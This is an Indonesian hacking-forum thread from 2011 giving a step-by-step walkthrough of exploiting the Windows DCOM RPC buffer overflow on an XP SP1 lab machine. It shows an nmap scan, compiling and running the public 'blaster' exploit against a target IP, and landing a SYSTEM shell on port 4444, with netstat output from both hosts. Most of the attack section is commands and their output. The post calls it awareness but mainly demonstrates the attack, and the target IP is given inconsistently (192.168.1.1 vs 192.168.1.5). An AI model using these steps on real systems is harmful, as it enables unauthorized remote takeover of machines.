.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 EKSPLOITASI RPC pada windows

Go down 
2 posters
PengirimMessage
BumiayuKita
Administrator
Administrator
BumiayuKita


Jumlah posting : 2456
Points : 3020
Reputation : 85
Join date : 06.02.11
Age : 34
Lokasi : bumiayu

EKSPLOITASI RPC pada windows Empty
PostSubyek: EKSPLOITASI RPC pada windows   EKSPLOITASI RPC pada windows Icon_minitimeSat Apr 23, 2011 1:37 pm

PERIPHERAL :

1. komputer ber-OS windows XP service pack 1 ; IP address 192.168.1.1
2. laptop ber-OS fedora 1 (yarrow) ; IP address 192.168.1.131
3. cross cable , UnShielded Twisted Pair , dengan rj45

[eksploitasi pertama]

[pada linux yarrow : 192.168.1.131]

pertama-tama kita scan dulu pc target alias windows yang akan kita
eksploitasi, dapat menggunakan nmap di linux

[root@localhost root]# nmap 192.168.1.5

Starting nmap 3.48 ( [Only registered and activated users can see links. ] ) at 2004-03-23 23:00 WIT
Interesting ports on 192.168.1.5:
(The 1652 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
5000/tcp open UPnP

hm ternyata port 135 ; alias msrpc terbuka
siapa tau bisa di ekploitasi rpcnya

pake sploits rpc, atau blastercode (terdapat di di ezine#1)
yang diambil dari [Only registered and activated users can see links. ]

compile dulu

[root@localhost umum]# gcc -o blaster blaster.c
[root@localhost umum]# ./blaster
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Usage: ./blaster <Target ID> <Target IP>
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP1 (english)
- 2 Windows 2000 SP2 (english)
- 3 Windows 2000 SP3 (english)
- 4 Windows 2000 SP4 (english)
- 5 Windows XP SP0 (english)
- 6 Windows XP SP1 (english)

[root@localhost umum]# ./blaster 6 192.168.1.5
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Using return address of 0x77e626ba
- Dropping to System Shell...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

kita masuk ke mesin target , mo ngapain aja juga bisa
baca artikel terkait soal ini

[pada pc target : windows xp : 192.168.1.1]

saat di eksploitasi apa yang terjadi , coba jalankan netstat

Microsoft(R) Windows DOS
(C)Copyright Microsoft Corp 1990-2001.

C:\DOCUME~1\Y3DIPS>netstat -ano

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 780 <<---
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 828<servis rpc lainnya
TCP 0.0.0.0:1028 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING 780 <<---
TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING 920
TCP 192.168.1.5:139 0.0.0.0:0 LISTENING 4
TCP 192.168.1.5:4444 192.168.1.131:32798 ESTABLISHED 780 <<--look at here!
UDP 0.0.0.0:135 *:* 780 <<--
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 612
UDP 0.0.0.0:1026 *:* 892
UDP 0.0.0.0:1027 *:* 828<servis rpc lainnya
UDP 0.0.0.0:1032 *:* 828<servis rpc lainnya
UDP 127.0.0.1:123 *:* 828<servis rpc lainnya
UDP 127.0.0.1:1900 *:* 920
UDP 192.168.1.5:123 *:* 828<servis rpc lainnya
UDP 192.168.1.5:137 *:* 4
UDP 192.168.1.5:138 *:* 4
UDP 192.168.1.5:1900 *:* 920

bandingkan dengan sebelum adanya eksploitasi :P

C:\DOCUME~1\Y3DIPS>netstat -ano

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 800
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 824
TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING 980
UDP 0.0.0.0:135 0.0.0.0:0 LISTENING 800
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 644
UDP 0.0.0.0:1026 *:* 824
UDP 127.0.0.1:123 *:* 834
UDP 127.0.0.1:1900 *:* 980

lihatlah bedanya :P

[keterangan]

penambahan process id yaitu 780 dengan melibatkan port 135 dan 4444 pada pc target
dan 32798 pada pc penyerang dalam hal ini ip 192.168.1.131

================================================== ==============================================

[eksploitasi kedua]

cara yang digunakan sama, dengan catatan pc target harus di restart agar bisa di
eksploitasi ulang, kenapa bisa begini? kok cuma satu kali ?
nanti akan kita jawab di bawah

[pc target]

eksploitasi ke 2

Microsoft(R) Windows DOS
(C)Copyright Microsoft Corp 1990-2001.

C:\DOCUME~1\Y3DIPS>netstat -ano

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 772<<--look at here!
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 820<servis rpc lainnya
TCP 0.0.0.0:1028 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING 772<<--look at here!
TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING 1044
TCP 192.168.1.5:139 0.0.0.0:0 LISTENING 4
TCP 192.168.1.5:4444 192.168.1.131:32800 ESTABLISHED 772<<--look at here!
UDP 0.0.0.0:135 *:* 772<<--look at here!
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 612
UDP 0.0.0.0:1026 *:* 820<servis rpc lainnya
UDP 0.0.0.0:1027 *:* 996
UDP 0.0.0.0:1032 *:* 820<servis rpc lainnya
UDP 127.0.0.1:123 *:* 820<servis rpc lainnya
UDP 127.0.0.1:1900 *:* 1044
UDP 192.168.1.5:123 *:* 820<servis rpc lainnya
UDP 192.168.1.5:137 *:* 4
UDP 192.168.1.5:138 *:* 4
UDP 192.168.1.5:1900 *:* 1044

[pc penyerang a.k.a 192.168.1.131]

[root@localhost root]# netstat -ap
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 *:32770 *:* LISTEN 1382/rpc.statd
tcp 0 0 *:pop3s *:* LISTEN 2085/xinetd
tcp 0 0 *:mysql *:* LISTEN 2122/mysqld
tcp 0 0 *:pop3 *:* LISTEN 2085/xinetd
tcp 0 0 *:sunrpc *:* LISTEN 1361/portmap
tcp 0 0 *:http *:* LISTEN 2151/httpd
tcp 0 0 192.168.1.131:domain *:* LISTEN 2059/named
tcp 0 0 localhost.locald:domain *:* LISTEN 2059/named
tcp 0 0 *:ssh *:* LISTEN 2073/sshd
tcp 0 0 localhost.localdom:rndc *:* LISTEN 2059/named
tcp 0 0 *:https *:* LISTEN 2151/httpd
tcp 0 0 192.168.1.131:32800 192.168.1.5:krb524 ESTABLISHED 2767/blaster<<--look at here!
udp 0 0 *:32768 *:* 1382/rpc.statd
udp 0 0 *:32769 *:* 2059/named
udp 0 0 192.168.1.131:domain *:* 2059/named
udp 0 0 localhost.locald:domain *:* 2059/named
udp 0 0 *:710 *:* 1382/rpc.statd
udp 0 0 *:sunrpc *:* 1361/portmap
Active UNIX domain sockets (servers and established)

---sisanya di potong----karena menyangkut internal system---gak perlu banget-----

lihat nama program yang kita eksekusi membuka hubungan ke pc target

[keterangan]

lihatlah port yang terbuka di pc target ,tetap merupakan port 135 dan 4444
sedangkan untuk koneksi ke pc penyerang portnya menjadi 32800;
lihat processID pada target juga berubah (ini lumrah) tapi lihat PID
tersebut tetap membuat 3 koneksi yang persis sama kecuali port pada penyerang

*tujuan eksploitasi ke 2 adalah membandingkan dari kedua pc , baik penyerang
dan targetnya.

C:\DOCUME~1\Y3DIPS>

================================================== ==================================================

eksploitasi ke 3

Microsoft(R) Windows DOS
(C)Copyright Microsoft Corp 1990-2001.

C:\DOCUME~1\Y3DIPS>netstat -ano

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 780 <<--look at here!
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 828<servis rpc lainnya
TCP 0.0.0.0:1028 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING 780 <<--look at here!
TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING 968
TCP 192.168.1.5:139 0.0.0.0:0 LISTENING 4
TCP 192.168.1.5:4444 192.168.1.131:32802 ESTABLISHED 780 <<--look at here!
UDP 0.0.0.0:135 *:* 780 <<--look at here!
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 612
UDP 0.0.0.0:1026 *:* 904
UDP 0.0.0.0:1027 *:* 828<servis rpc lainnya
UDP 0.0.0.0:1032 *:* 828<servis rpc lainnya
UDP 127.0.0.1:123 *:* 828<servis rpc lainnya
UDP 127.0.0.1:1900 *:* 968
UDP 192.168.1.5:123 *:* 828<servis rpc lainnya
UDP 192.168.1.5:137 *:* 4
UDP 192.168.1.5:138 *:* 4
UDP 192.168.1.5:1900 *:* 968

C:\DOCUME~1\Y3DIPS>

disini terlihat kalau port yang di buka pada pc target adalah port 4444,
kesimpulan ini kita dapat dari hipotesa kita selam 3 kali

tetapi bukan itu saja , apabila kita mempunyai kodenya maka kita akan tau
kalo memang port ini yang di gunakan untuk melakukan koneksi (catatan
port ini tidak berlaku general, alias terserah pembuat program untuk
menggunakan port berapapun untuk membind shell :P )

[hal yang unik]

pada ujicoba menggunakan sploits ini terdapat hal yang unik, yaitu pada
saat akan memutuskan koneksi ke remote pc (pc target) maka otomatis pc
target akan di shutdon! , mengapa begitu ? baca aja terus ..

================================================== ==================================

[pc attacker; pada saat eksekusi sploits dan pemutusan koneksi]

[root@localhost umum]# ./blaster 6 192.168.1.5
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Using return address of 0x77e626ba
- Dropping to System Shell...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>exit
exit

- Read failure

================================================== ===================================

[pc target saat koneksi di putuskan oleh attacker]

pada pc target akan muncul message box yang isinya seperti berikut ini

--------------------------------------------------
| this system is shutting down. please save |
| all work in progress and log off. any unsaved |
| changes will be lost. this shutdown initiadted |
| by NT Authority\system |
|================================================|
| time before shutdown :00 :00 :60 |
|================================================|
| windows must restart because the rpc service |
| terminated unexpectly |
--------------------------------------------------

Timer tersebut akan menghitung mundur sampai 0 dan melakukan shutdown pada pc
target. target dapat membatalkan shutdown tersebut dengan cara mengetikkan
shutdown -a pada command prompt . Tetapi bukan ini yang kita bahas, yang
kita bahas adalah kenapa itu bisa terjadi?

ternyata setelah di cek pada processes di windows task manager ,mendapatkan
hasil sbb:

svchost pada windows task manager yang sebelum di eksploitasi terdapat 5 buah
(tentunya ini sudah terserang)

apabila koneksi diputuskan oleh attacker maka akan segera mengakhiri processnya,
(svchost) inilah yang membuat komputer atau pc tersebut menjadi restart
(untuk jelasnya anda dapat membaca artikel terkait di ezine ini juga tentang
pentingnya rpc bagi windows :: berjudul 'securing windows XP')

[kesimpulan]

semakin anda tahu semakin anda waspada, itulah yang kita harapkan

contoh ini tidak akan mengeneralisasi semua eksploit RPC, tetapi kebanyakan
memiliki tanda tanda yang sama , aku baru mencoba 2 sploits ;1 untuk windows
yaitu KAHT2 dan dari linux adalah Remote DCOM RPC Buffer Overflow Exploit ini.
Kembali Ke Atas Go down
http://aljinet.blogspot.com
BumiayuKita
Administrator
Administrator
BumiayuKita


Jumlah posting : 2456
Points : 3020
Reputation : 85
Join date : 06.02.11
Age : 34
Lokasi : bumiayu

EKSPLOITASI RPC pada windows Empty
PostSubyek: Re: EKSPLOITASI RPC pada windows   EKSPLOITASI RPC pada windows Icon_minitimeFri May 06, 2011 5:52 pm

EKSPLOITASI RPC pada windows 772168924 EKSPLOITASI RPC pada windows 772168924 EKSPLOITASI RPC pada windows 772168924
Kembali Ke Atas Go down
http://aljinet.blogspot.com
Dicky nugraha
Pro Nubie
Pro Nubie
Dicky nugraha


Jumlah posting : 57
Points : 116
Reputation : 7
Join date : 03.05.11
Lokasi : Tangerang

EKSPLOITASI RPC pada windows Empty
PostSubyek: Re: EKSPLOITASI RPC pada windows   EKSPLOITASI RPC pada windows Icon_minitimeFri May 06, 2011 6:35 pm

Langsung ke T.K.P....
:mgaya: :mgaya:
Kembali Ke Atas Go down
Http://www.dicky-nugraha.blogspot.com
BumiayuKita
Administrator
Administrator
BumiayuKita


Jumlah posting : 2456
Points : 3020
Reputation : 85
Join date : 06.02.11
Age : 34
Lokasi : bumiayu

EKSPLOITASI RPC pada windows Empty
PostSubyek: Re: EKSPLOITASI RPC pada windows   EKSPLOITASI RPC pada windows Icon_minitimeSat May 07, 2011 10:32 am

EKSPLOITASI RPC pada windows 2446797354 EKSPLOITASI RPC pada windows 2446797354 EKSPLOITASI RPC pada windows 2446797354 mantab silakan kak
Kembali Ke Atas Go down
http://aljinet.blogspot.com
Sponsored content





EKSPLOITASI RPC pada windows Empty
PostSubyek: Re: EKSPLOITASI RPC pada windows   EKSPLOITASI RPC pada windows Icon_minitime

Kembali Ke Atas Go down
 
EKSPLOITASI RPC pada windows
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» BitLocker pada Windows 7
» Cara Mempercepat ShutDown Pada Windows
» memberi password pada folder [0n Windows]
» Menambahkan Password Share Folder Pada Windows XP
» Mengubah MAC Address Wireless Adapter pada Windows 7

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Exploits-
Navigasi: